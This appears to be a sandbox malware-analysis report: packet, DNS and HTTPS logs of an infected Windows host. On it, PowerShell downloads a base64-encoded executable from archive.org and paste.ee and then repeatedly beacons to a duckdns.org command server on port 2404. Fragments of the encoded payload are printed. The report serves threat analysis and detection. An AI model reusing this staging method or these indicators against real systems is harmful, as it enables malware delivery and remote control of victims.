                                      Sep 26, 2024 10:59:31.517630100 CEST521172404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:31.522581100 CEST240452117181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:31.525942087 CEST521172404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:31.526185989 CEST521172404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:31.530989885 CEST240452117181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:33.124003887 CEST240452117181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:33.124098063 CEST521172404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:33.124098063 CEST521172404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:33.128972054 CEST240452117181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:34.127439976 CEST521192404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:34.132323980 CEST240452119181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:34.132390022 CEST521192404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:34.132699966 CEST521192404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:34.137773037 CEST240452119181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:35.756802082 CEST240452119181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:35.756911039 CEST521192404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:35.756947041 CEST521192404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:35.761821032 CEST240452119181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:36.767950058 CEST521202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:36.772813082 CEST240452120181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:36.772907972 CEST521202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:36.773248911 CEST521202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:36.778039932 CEST240452120181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:38.445172071 CEST240452120181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:38.446355104 CEST521202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:38.446544886 CEST521202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:38.451311111 CEST240452120181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:39.455285072 CEST521212404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:39.460252047 CEST240452121181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:39.460406065 CEST521212404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:39.460609913 CEST521212404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:39.465368032 CEST240452121181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:41.081751108 CEST240452121181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:41.081808090 CEST521212404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:41.081835985 CEST521212404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:41.087805986 CEST240452121181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:42.099040985 CEST521222404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:42.104012966 CEST240452122181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:42.104080915 CEST521222404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:42.104552031 CEST521222404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:42.109464884 CEST240452122181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:43.724359035 CEST240452122181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:43.725969076 CEST521222404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:43.725990057 CEST521222404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:43.730942011 CEST240452122181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:44.705112934 CEST521232404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:44.710988045 CEST240452123181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:44.711071968 CEST521232404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:44.711299896 CEST521232404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:44.716192007 CEST240452123181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:46.372303963 CEST240452123181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:46.372786999 CEST521232404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:46.372829914 CEST521232404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:46.377631903 CEST240452123181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:47.315016031 CEST521242404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:47.319976091 CEST240452124181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:47.321963072 CEST521242404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:47.322623014 CEST521242404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:47.327483892 CEST240452124181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:48.927053928 CEST240452124181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:48.927120924 CEST521242404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:48.927191973 CEST521242404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:48.932214022 CEST240452124181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:49.846422911 CEST521252404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:49.852968931 CEST240452125181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:49.853045940 CEST521252404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:49.853287935 CEST521252404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:49.858042002 CEST240452125181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:51.511156082 CEST240452125181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:51.513998032 CEST521252404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:51.514044046 CEST521252404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:51.518884897 CEST240452125181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:52.392708063 CEST521262404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:52.397701025 CEST240452126181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:52.401972055 CEST521262404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:52.402234077 CEST521262404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:52.407812119 CEST240452126181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:54.015822887 CEST240452126181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:54.016875982 CEST521262404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:54.017124891 CEST521262404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:54.021836996 CEST240452126181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:54.925007105 CEST521272404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:54.929862976 CEST240452127181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:54.929939985 CEST521272404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:54.930365086 CEST521272404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:54.935415030 CEST240452127181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:56.550987005 CEST240452127181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:56.553977013 CEST521272404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:56.554024935 CEST521272404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:56.558926105 CEST240452127181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:57.377001047 CEST521282404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:57.382117987 CEST240452128181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:57.385998011 CEST521282404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:57.386279106 CEST521282404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:57.391200066 CEST240452128181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:59.005148888 CEST240452128181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:59.005248070 CEST521282404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:59.005292892 CEST521282404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:59.010207891 CEST240452128181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:59.798785925 CEST521292404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:59.803786993 CEST240452129181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:59:59.806005955 CEST521292404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:59.806268930 CEST521292404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:59:59.811494112 CEST240452129181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:01.424021006 CEST240452129181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:01.424093962 CEST521292404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:01.424144983 CEST521292404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:01.429863930 CEST240452129181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:02.189410925 CEST521302404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:02.194344044 CEST240452130181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:02.197995901 CEST521302404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:02.198262930 CEST521302404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:02.203133106 CEST240452130181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:03.841607094 CEST240452130181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:03.841976881 CEST521302404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:03.842120886 CEST521302404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:03.846997976 CEST240452130181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:04.595668077 CEST521312404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:04.600687027 CEST240452131181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:04.600788116 CEST521312404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:04.601058960 CEST521312404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:04.605870962 CEST240452131181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:06.250519037 CEST240452131181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:06.251251936 CEST521312404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:06.251286983 CEST521312404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:06.256167889 CEST240452131181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:06.970881939 CEST521322404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:06.975812912 CEST240452132181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:06.976263046 CEST521322404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:06.976501942 CEST521322404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:06.981306076 CEST240452132181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:08.621799946 CEST240452132181.236.206.3192.168.2.6
                                      Sep 26, 2024 11:00:08.621869087 CEST521322404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:08.732546091 CEST521322404192.168.2.6181.236.206.3
                                      Sep 26, 2024 11:00:08.738679886 CEST240452132181.236.206.3192.168.2.6

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 26, 2024 10:58:03.179666996 CEST6030653192.168.2.61.1.1.1
                                      Sep 26, 2024 10:58:03.327965975 CEST53603061.1.1.1192.168.2.6
                                      Sep 26, 2024 10:58:06.370064020 CEST5223353192.168.2.61.1.1.1
                                      Sep 26, 2024 10:58:06.379019022 CEST53522331.1.1.1192.168.2.6
                                      Sep 26, 2024 10:58:07.850943089 CEST5641353192.168.2.61.1.1.1
                                      Sep 26, 2024 10:58:08.844839096 CEST5641353192.168.2.61.1.1.1
                                      Sep 26, 2024 10:58:09.479543924 CEST53564131.1.1.1192.168.2.6
                                      Sep 26, 2024 10:58:09.479566097 CEST53564131.1.1.1192.168.2.6
                                      Sep 26, 2024 10:58:42.839009047 CEST5361576162.159.36.2192.168.2.6
                                      Sep 26, 2024 10:58:43.339013100 CEST53538371.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:10.487037897 CEST5946153192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:11.501614094 CEST5946153192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:12.518511057 CEST5946153192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:14.532416105 CEST5946153192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:16.255606890 CEST53594611.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:16.255630970 CEST53594611.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:16.255646944 CEST53594611.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:16.255657911 CEST53594611.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:17.267355919 CEST5323553192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:18.267319918 CEST5323553192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:19.285393953 CEST5323553192.168.2.61.1.1.1
                                      Sep 26, 2024 10:59:20.951941013 CEST53532351.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:20.951961040 CEST53532351.1.1.1192.168.2.6
                                      Sep 26, 2024 10:59:20.951976061 CEST53532351.1.1.1192.168.2.6

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 26, 2024 10:58:03.179666996 CEST192.168.2.61.1.1.10x40d7Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:06.370064020 CEST192.168.2.61.1.1.10xd1a4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:07.850943089 CEST192.168.2.61.1.1.10xe6a3Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:08.844839096 CEST192.168.2.61.1.1.10xe6a3Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:10.487037897 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:11.501614094 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:12.518511057 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:14.532416105 CEST192.168.2.61.1.1.10x1927Standard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:17.267355919 CEST192.168.2.61.1.1.10x33cfStandard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:18.267319918 CEST192.168.2.61.1.1.10x33cfStandard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:19.285393953 CEST192.168.2.61.1.1.10x33cfStandard query (0)newssssssssssssss.duckdns.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 26, 2024 10:58:03.327965975 CEST1.1.1.1192.168.2.60x40d7No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:06.379019022 CEST1.1.1.1192.168.2.60xd1a4No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:06.379019022 CEST1.1.1.1192.168.2.60xd1a4No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:09.479543924 CEST1.1.1.1192.168.2.60xe6a3No error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:58:09.479566097 CEST1.1.1.1192.168.2.60xe6a3No error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:16.255606890 CEST1.1.1.1192.168.2.60x1927Server failure (2)newssssssssssssss.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:16.255630970 CEST1.1.1.1192.168.2.60x1927Server failure (2)newssssssssssssss.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:16.255646944 CEST1.1.1.1192.168.2.60x1927Server failure (2)newssssssssssssss.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:16.255657911 CEST1.1.1.1192.168.2.60x1927Server failure (2)newssssssssssssss.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:20.951941013 CEST1.1.1.1192.168.2.60x33cfNo error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:20.951961040 CEST1.1.1.1192.168.2.60x33cfNo error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:20.951976061 CEST1.1.1.1192.168.2.60x33cfNo error (0)newssssssssssssss.duckdns.org181.236.206.3A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • ia600100.us.archive.org
                                      • paste.ee

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.649711207.241.227.2404436784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:58:03 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                      Host: ia600100.us.archive.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:58:04 UTC606INHTTP/1.1 200 OK
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Thu, 26 Sep 2024 08:58:04 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 2823512
                                      Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                      Connection: close
                                      ETag: "66e22cba-2b1558"
                                      Strict-Transport-Security: max-age=15724800
                                      Expires: Thu, 26 Sep 2024 14:58:04 GMT
                                      Cache-Control: max-age=21600
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                      Access-Control-Allow-Credentials: true
                                      Accept-Ranges: bytes
                                      2024-09-26 08:58:04 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                      Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                      2024-09-26 08:58:04 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                      Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                      Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                      Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                      Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
